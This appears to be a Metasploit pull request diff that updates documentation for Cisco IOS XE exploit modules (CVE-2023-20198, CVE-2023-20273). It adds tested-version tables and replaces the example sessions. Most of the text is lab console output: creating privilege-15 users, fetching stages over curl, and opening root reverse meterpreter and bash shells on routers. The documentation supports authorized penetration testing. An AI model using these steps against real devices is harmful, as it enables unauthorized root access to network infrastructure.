### PR TITLE
Improve exploit/linux/misc/cisco_ios_xe_rce (CVE-2023-20198 + CVE-2023-20273)

### DIFF
--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -34,7 +34,15 @@ The vulnerable IOS XE versions are:
 17.11.99SW
 
 ## Testing
-This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
+This module was tested against the following IOS XE versions:
+
+| IOS XE Version | Appliance Series |
+|----------------|------------------|
+| 16.12.3        | C1000v           |
+| 17.03.02       | C1000v           |
+| 17.06.05       | C8000v           |
+
+To test this module you will need to either:
 
 * Acquire a hardware device running one of the vulnerable firmware versions listed above.
 
@@ -87,6 +95,7 @@ modes are `user`, `privileged`, and `global`.
 
 ## Scenarios
 
+### IOS-XE 16.12.03 (C1000v)
 ```
 msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
@@ -167,6 +176,87 @@ msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show 
 
 
 *15:24:05.110 UTC Fri Nov 3 2023
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
+```
+
+### IOS-XE 17.06.05 (C8000v)
+
+```
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 
+
+Module options (auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   CMD      show version     yes       The CLI command to execute.
+   MODE     privileged       yes       The mode to execute the CLI command in, valid values are 'user', 'privileged', or 'global'.
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.108   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run
+[*] Running module against 192.168.86.108
+
+Cisco IOS XE Software, Version 17.06.05
+Cisco IOS Software [Bengaluru], Virtual XE Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 17.6.5, RELEASE SOFTWARE (fc2)
+Technical Support: http://www.cisco.com/techsupport
+Copyright (c) 1986-2023 by Cisco Systems, Inc.
+Compiled Wed 25-Jan-23 16:07 by mcpre
+Cisco IOS-XE software, Copyright (c) 2005-2023 by cisco Systems, Inc.
+All rights reserved.  Certain components of Cisco IOS-XE software are
+licensed under the GNU General Public License ("GPL") Version 2.0.  The
+software code licensed under GPL Version 2.0 is free software that comes
+with ABSOLUTELY NO WARRANTY.  You can redistribute and/or modify such
+GPL code under the terms of GPL Version 2.0.  For more details, see the
+documentation or "License Notice" file accompanying the IOS-XE software,
+or the applicable URL provided on the flyer accompanying the IOS-XE
+software.
+ROM: IOS-XE ROMMON
+test_c800v uptime is 1 hour, 43 minutes
+Uptime for this control processor is 1 hour, 44 minutes
+System returned to ROM by reload
+System image file is "bootflash:packages.conf"
+Last reload reason: reload
+This product contains cryptographic features and is subject to United
+States and local country laws governing import, export, transfer and
+use. Delivery of Cisco cryptographic products does not imply
+third-party authority to import, export, distribute or use encryption.
+Importers, exporters, distributors and users are responsible for
+compliance with U.S. and local country laws. By using this product you
+agree to comply with applicable laws and regulations. If you are unable
+to comply with U.S. and local laws, return this product immediately.
+A summary of U.S. laws governing Cisco cryptographic products may be found at:
+http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
+If you require further assistance please contact us by sending email to
+export@cisco.com.
+License Level: 
+License Type: Perpetual
+Next reload license Level: 
+Addon License Level: 
+Addon License Type: Subscription
+Next reload addon license Level: 
+The current throughput level is 10000 kbps 
+Smart Licensing Status: Registration Not Applicable/Not Applicable
+cisco C8000V (VXE) processor (revision VXE) with 2027875K/3075K bytes of memory.
+Processor board ID 9VM6T5CQNTE
+Router operating mode: Autonomous
+3 Gigabit Ethernet interfaces
+32768K bytes of non-volatile configuration memory.
+3965316K bytes of physical memory.
+11526144K bytes of virtual hard disk at bootflash:.
+Configuration register is 0x2102
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show clock"
+[*] Running module against 192.168.86.108
+
+*17:36:50.722 UTC Mon Mar 3 2025
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198.md
@@ -38,8 +38,8 @@ This module was tested against the following IOS XE versions:
 
 | IOS XE Version | Appliance Series |
 |----------------|------------------|
-| 16.12.3        | C1000v           |
-| 17.03.02       | C1000v           |
+| 16.12.3        | CSR1000v         |
+| 17.03.02       | CSR1000v         |
 | 17.06.05       | C8000v           |
 
 To test this module you will need to either:
@@ -95,7 +95,7 @@ modes are `user`, `privileged`, and `global`.
 
 ## Scenarios
 
-### IOS-XE 16.12.03 (C1000v)
+### IOS XE 16.12.03 (CSR1000v)
 ```
 msf6 > use auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > set RHOST 192.168.86.57
@@ -180,7 +180,7 @@ msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > run CMD="show 
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > 
 ```
 
-### IOS-XE 17.06.05 (C8000v)
+### IOS XE 17.06.05 (C8000v)
 
 ```
 msf6 auxiliary(admin/http/cisco_ios_xe_cli_exec_cve_2023_20198) > show options 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -31,6 +31,9 @@ The vulnerable IOS XE versions are:
 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
 17.11.99SW
 
+NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+
 ## Testing
 This module was tested against IOS XE version 16.12.3. To test this module you will need to either:
 

--- a/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
+++ b/documentation/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.md
@@ -32,7 +32,7 @@ The vulnerable IOS XE versions are:
 17.11.99SW
 
 NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
-though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
 
 ## Testing
 This module was tested against IOS XE version 16.12.3. To test this module you will need to either:

--- a/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
+++ b/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
@@ -26,6 +26,9 @@ The vulnerable IOS XE versions are:
 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
 17.11.99SW
 
+NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+
 ## Testing
 This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
 

--- a/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
+++ b/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
@@ -27,10 +27,11 @@ The vulnerable IOS XE versions are:
 17.11.99SW
 
 NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
-though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
 
 ## Testing
-This module was tested against IOS XE version 16.12.3 and version 17.3.2. To test this module you will need to either:
+This module was tested against IOS XE version 16.12.3 and version 17.3.2 running on a CSR1000v appliance. 
+To test this module you will need to either:
 
 * Acquire a hardware device running one of the vulnerable firmware versions listed above.
 

--- a/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
+++ b/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
@@ -89,13 +89,12 @@ This allows for native Linux payloads to be used, but also payloads like Python 
 ### Linux Command (IOS XE 17.3.2)
 
 ```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOST 192.168.86.58
-RHOST => 192.168.86.58
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
+RHOSTS => 192.168.86.113
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
 target => 0
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
 payload => cmd/linux/http/x64/meterpreter/reverse_tcp
-[+] 192.168.86.58:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
 
 Module options (exploit/linux/misc/cisco_ios_xe_rce):
@@ -105,7 +104,7 @@ Module options (exploit/linux/misc/cisco_ios_xe_rce):
    CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
    CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
    Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS             192.168.86.58    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RHOSTS             192.168.86.113   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT              443              yes       The target port (TCP)
    SSL                true             no        Negotiate SSL/TLS for outgoing connections
    VHOST                               no        HTTP server virtual host
@@ -113,103 +112,24 @@ Module options (exploit/linux/misc/cisco_ios_xe_rce):
 
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
 
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      dDrTvTlqxwoK     no        Name to use on remote system when storing payload; cannot contain spaces.
-   FETCH_SRVHOST                        no        Local IP to use for serving payload
-   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
-   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
-   LPORT               4444             yes       The listen port
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           eth0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
 
 
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   Linux Command
-
-
-
-View the full module info with the info, or info -d command.
-
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
-[*] Created privilege 15 user 'sqVXixoV' with password 'ZiPbsXBu'
-[*] Removing user 'sqVXixoV'
-[*] Sending stage (3045380 bytes) to 192.168.86.58
-[*] Meterpreter session 6 opened (192.168.86.42:4444 -> 192.168.86.58:64970) at 2023-11-06 17:01:06 +0000
-
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
-Computer     : router
-OS           :  (Linux 4.19.106)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
-meterpreter >
-```
-
-```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
-payload => cmd/linux/http/x64/shell/reverse_tcp
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
-[*] Created privilege 15 user 'pfGnCwkI' with password 'YhTwxBLK'
-[*] Removing user 'pfGnCwkI'
-[*] Sending stage (38 bytes) to 192.168.86.58
-[*] Command shell session 7 opened (192.168.86.42:4444 -> 192.168.86.58:64994) at 2023-11-06 17:01:44 +0000
-
-id
-uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
-uname -a
-Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
-exit
-[*] 192.168.86.58 - Command shell session 7 closed.
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
-```
-
-### Linux Command (IOS XE 16.12.3)
-
-```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
-
-Module options (exploit/linux/misc/cisco_ios_xe_rce):
-
-   Name               Current Setting  Required  Description
-   ----               ---------------  --------  -----------
-   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
-   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
-   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS             192.168.86.59    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT              443              yes       The target port (TCP)
-   SSL                true             no        Negotiate SSL/TLS for outgoing connections
-   VHOST                               no        HTTP server virtual host
-
-
-Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+   When FETCH_FILELESS is false:
 
    Name                Current Setting  Required  Description
    ----                ---------------  --------  -----------
-   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      ytfnShmfT        no        Name to use on remote system when storing payload; cannot contain spaces.
-   FETCH_SRVHOST                        no        Local IP to use for serving payload
-   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
-   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               192.168.86.42    yes       The listen address (an interface may be specified)
-   LPORT               4444             yes       The listen port
+   FETCH_FILENAME      vsLOEPPqU        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
 
 
 Exploit target:
@@ -223,108 +143,56 @@ Exploit target:
 View the full module info with the info, or info -d command.
 
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
-[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
+[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-[*] Created privilege 15 user 'lwWQIDaS' with password 'dADCGJpS'
-[*] Removing user 'lwWQIDaS'
-[*] Sending stage (3045380 bytes) to 192.168.86.59
-[*] Meterpreter session 2 opened (192.168.86.42:4444 -> 192.168.86.59:56554) at 2023-11-06 16:41:06 +0000
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'vTakCDWG' with password 'RJQHKnKK'
+[*] Removing user 'vTakCDWG'
+[*] Sending stage (3045380 bytes) to 192.168.86.113
+[*] Meterpreter session 5 opened (192.168.86.122:4444 -> 192.168.86.113:56702) at 2025-03-03 20:31:39 +0000
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : router
-OS           :  (Linux 4.19.64)
+Computer     : testc100v
+OS           :  (Linux 4.19.106)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
-```
-
-```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
-target => 0
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
-payload => cmd/linux/http/x64/shell/reverse_tcp
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-[*] Created privilege 15 user 'NjAmOioM' with password 'tOHjWGyw'
-[*] Removing user 'NjAmOioM'
-[*] Sending stage (38 bytes) to 192.168.86.59
-[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.59:56598) at 2023-11-06 16:44:48 +0000
-
-id
-uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
-uname -a
-Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
-exit
-[*] 192.168.86.59 - Command shell session 5 closed.
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
-```
-
-### Unix Target (IOS XE 17.3.2)
-
-```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
-target => 1
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
-payload => cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
-[*] Created privilege 15 user 'JAonVuJS' with password 'vYecWhWk'
-[*] Removing user 'JAonVuJS'
-[*] Sending stage (24772 bytes) to 192.168.86.58
-[*] Meterpreter session 8 opened (192.168.86.42:4444 -> 192.168.86.58:65016) at 2023-11-06 17:03:34 +0000
-
-meterpreter > getuid
-Server username: root
-meterpreter > sysinfo
-Computer     : router
-OS           : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
-Architecture : x64
-Meterpreter  : python/linux
 meterpreter >
 ```
 
 ```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
-payload => cmd/unix/reverse_bash
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
+payload => cmd/linux/http/x64/shell/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
-[*] Created privilege 15 user 'TVtEhbdd' with password 'NtRvujcZ'
-[*] Removing user 'TVtEhbdd'
-[*] Command shell session 9 opened (192.168.86.42:4444 -> 192.168.86.58:65036) at 2023-11-06 17:04:28 +0000
+[*] Created privilege 15 user 'VltpvRrx' with password 'KDJGXORf'
+[*] Removing user 'VltpvRrx'
+[*] Sending stage (38 bytes) to 192.168.86.113
+[*] Command shell session 6 opened (192.168.86.122:4444 -> 192.168.86.113:56736) at 2025-03-03 20:32:52 +0000
 
 id
 uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
 uname -a
-Linux router 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 exit
-[*] 192.168.86.58 - Command shell session 9 closed.
+[*] 192.168.86.113 - Command shell session 6 closed.
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
 ```
 
-### Unix Target (IOS XE 16.12.3)
+### Linux Command (IOS XE 16.12.3)
 
 ```
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
-target => 1
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
-payload => cmd/unix/python/meterpreter/reverse_tcp
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
+RHOSTS => 192.168.86.114
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options 
 
 Module options (exploit/linux/misc/cisco_ios_xe_rce):
 
@@ -333,7 +201,156 @@ Module options (exploit/linux/misc/cisco_ios_xe_rce):
    CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
    CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
    Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS             192.168.86.59    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              443              yes       The target port (TCP)
+   SSL                true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST           eth0             yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_FILELESS is false:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      UoDekiVI         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > check 
+[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'XpJaBQIt' with password 'qEBrzlDh'
+[*] Removing user 'XpJaBQIt'
+[*] Sending stage (3045380 bytes) to 192.168.86.114
+[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.114:61922) at 2025-03-03 20:34:05 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : test2_c1000v
+OS           :  (Linux 4.19.64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 0
+target => 0
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
+payload => cmd/linux/http/x64/shell/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+[*] Created privilege 15 user 'vmoCbNcA' with password 'UgDnLaCG'
+[*] Removing user 'vmoCbNcA'
+[*] Sending stage (38 bytes) to 192.168.86.114
+[*] Command shell session 8 opened (192.168.86.122:4444 -> 192.168.86.114:61940) at 2025-03-03 20:34:58 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.114 - Command shell session 8 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```
+
+### Unix Target (IOS XE 17.3.2)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
+RHOSTS => 192.168.86.113
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
+target => 1
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'edGjwUsF' with password 'hhOLNNrX'
+[*] Removing user 'edGjwUsF'
+[*] Sending stage (24772 bytes) to 192.168.86.113
+[*] Meterpreter session 9 opened (192.168.86.122:4444 -> 192.168.86.113:56770) at 2025-03-03 20:36:00 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : testc100v
+OS           : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > 
+```
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
+[*] Created privilege 15 user 'mXsKBwvG' with password 'gCUirrkj'
+[*] Removing user 'mXsKBwvG'
+[*] Command shell session 10 opened (192.168.86.122:4444 -> 192.168.86.113:56802) at 2025-03-03 20:36:39 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
+uname -a
+Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.113 - Command shell session 10 closed.
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
+```
+
+### Unix Target (IOS XE 16.12.3)
+
+```
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
+RHOSTS => 192.168.86.114
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set target 1
+target => 1
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
+payload => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > show options 
+
+Module options (exploit/linux/misc/cisco_ios_xe_rce):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
+   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT              443              yes       The target port (TCP)
    SSL                true             no        Negotiate SSL/TLS for outgoing connections
    VHOST                               no        HTTP server virtual host
@@ -343,7 +360,7 @@ Payload options (cmd/unix/python/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
+   LHOST  eth0             yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -357,45 +374,43 @@ Exploit target:
 
